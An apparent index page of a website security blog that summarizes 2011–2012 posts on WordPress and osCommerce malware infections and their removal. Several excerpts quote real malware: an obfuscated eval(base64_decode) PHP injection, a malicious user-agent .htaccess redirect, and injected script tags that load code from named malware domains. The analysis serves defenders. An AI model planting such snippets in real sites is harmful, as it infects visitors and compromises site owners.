This post was put together in collaboration with one of our Support Engineers, Bruno Borges. Be sure to take a minute and say thanks for the info, he loves twitter (when its up). It seems every day we’re combating malicious redirections. Often, they are simple, but everyday they are evolving, and in some instances become [...]
Website Malware Removal – Counter.php
July 18, 2012 by Leave a Comment
There are many variations to the Counter.php malware floating around the interwebs. This is a malicious redirect that sends your readers to a known bad site, that site houses a payload that responds based on the incoming user-agent. Malicious Site: natbushing.com Payload: counter.php Check out Sucuri Labs for more variations of Counter.php If you use [...]
Website Malware Removal – Blackhole Exploit
July 14, 2012 by Leave a Comment
Here is a quick little write up on how to to deal with one, of many variations, of the Blackhole Exploit. The Infection If you scan your site using Sucuri SiteCheck and find yourself with a result that looks like this: Then you are dealing with an infection that is facilitated through the use of [...]
Understanding Conditional Malware – IP Centric Variation
June 21, 2012 by
In today’s web malware landscape you can’t help but take a minute to familiarize yourself with a concept known as conditional malware. As implied in the name, it’s malware that only works when specific rules are met. Those rules can range from specific IP ranges to time of day. They are very tricky and as [...]
New Malware – Eval + GetMama + Encoded Javascript
March 15, 2012 by
We are seeing many WordPress sites on shared hosts getting compromised with an encoded javascript malware. It has multiple levels of obfuscation and that’s how it starts: 1- ALL PHP files with an eval (base64_decode line of code: /*god_mode_on*/eval (base64_decode("ZXZhbC hiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0 phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBvVmpGc2 JsTXdUa2RpVjFKWVRsZHdhMUl5ZURKWmJYYzFZa.. 2- That long piece of code, once executed gets decoded to: if (!function_exists(GetMama)){function opanki ($buf){$god_mode = $_SERVER["good"]; [...]
Ugly htaccess
February 22, 2012 by
No need to comment: ##!!##!!##!!##!!##!!####!!##!!##!!##!!##!!## RewriteEngine on RewriteCond %{HTTP_USER_AGENT} acs [NC,OR] RewriteCond %{HTTP_USER_AGENT} alav [NC,OR] RewriteCond %{HTTP_USER_AGENT} alca [NC,OR] RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR] RewriteCond %{HTTP_USER_AGENT} audi [NC,OR] RewriteCond %{HTTP_USER_AGENT} aste [NC,OR] RewriteCond %{HTTP_USER_AGENT} avan [NC,OR] RewriteCond %{HTTP_USER_AGENT} benq [NC,OR] RewriteCond %{HTTP_USER_AGENT} bird [NC,OR] RewriteCond %{HTTP_USER_AGENT} blac [NC,OR] RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR] RewriteCond %{HTTP_USER_AGENT} brew [NC,OR] [...]
New Malware – sweepstakesandcontestsnow.com
September 19, 2011 by
We are seeing many WordPress sites on shared hosts (GoDaddy, Bluehost, Dreamhost and a few others) compromised with a malware from sweepstakesandcontestsnow.com. This is what is gets added to the hacked site: <script src="http://sweepstakesandcontestsnow.com/nl.php?nnn=1">.. And that code is used to infect the browser of the person visiting the compromised web site. What is interesting [...]
Malware updates: Aug 2011 – .htaccess to .ru and osa.pl, iframes to .cc and .il
September 13, 2011 by
We are often asked what were the top domains distributing malware or what threats we see more often on our security scanner. For the month of August, things were very similar to the previous ones, with a slightly increase in the number of WordPress sites compromised due to the Timthumb.php vulnerability. If your site [...]
Malware update – Timthumb.php and .htaccess redirection
August 21, 2011 by
We have been very busy in our blog explaining about the latest TimThumb.php vulnerability and the affect it is having on WordPress web sites. If you missed the articles, please check here: TimThumb.php – Just the tip of the iceberg Attacks Against Timthumb.php in the Wild – List of Themes and Plugins Being Scanned [...]
osCommerce compromises – Now from tiasissi.com.br
August 12, 2011 by
We have been blogging about the “willysy” malware for a little while, but the attacks against osCommerce are still happening and very active. The latest change is that the “willysy.com” (or exero.eu) type of injection have switched to http://tiasissi.com.br/revendedores/jquery/. That’s what shows up on the hacked sites: <script src= http://tiasissi.com.br/revendedores/jquery/> Sucuri identifies those type of web-based [...]
